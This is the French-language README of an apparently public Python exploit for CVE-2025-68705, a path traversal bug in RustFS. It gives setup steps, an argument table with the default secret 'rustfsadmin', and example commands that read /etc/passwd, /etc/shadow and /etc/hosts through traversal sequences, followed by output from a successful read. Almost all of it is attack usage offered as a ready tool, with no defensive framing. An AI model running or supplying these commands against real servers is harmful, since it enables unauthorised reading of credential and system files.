
Script d'exploitation Python pour CVE-2025-68705, une vulnérabilité de traversée de chemin dans RustFS, permettant la lecture arbitraire de fichiers et la vérification de vulnérabilités sur les serveurs cibles.
Ce script exploite une vulnérabilité de traversée de chemin (CVE-2025-68705) dans RustFS qui permet de lire des fichiers arbitraires sur le serveur.
requirements.txt pour les dépendancesgit clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| Argument | Description |
|---|---|
-H, --host | Adresse IP ou nom d'hôte cible |
-p, --port | Numéro de port cible |
-f, --file | Chemin du fichier à lire (optionnel avec --check-only) |
| Argument | Description | Par défaut |
|---|---|---|
-s, --secret | Clé secrète pour la signature | rustfsadmin |
-o, --offset | Décalage de lecture du fichier | 0 |
-l, --length | Nombre d'octets à lire | 4096 |
--check-only | Vérifier uniquement si la cible est vulnérable | - |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!
[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.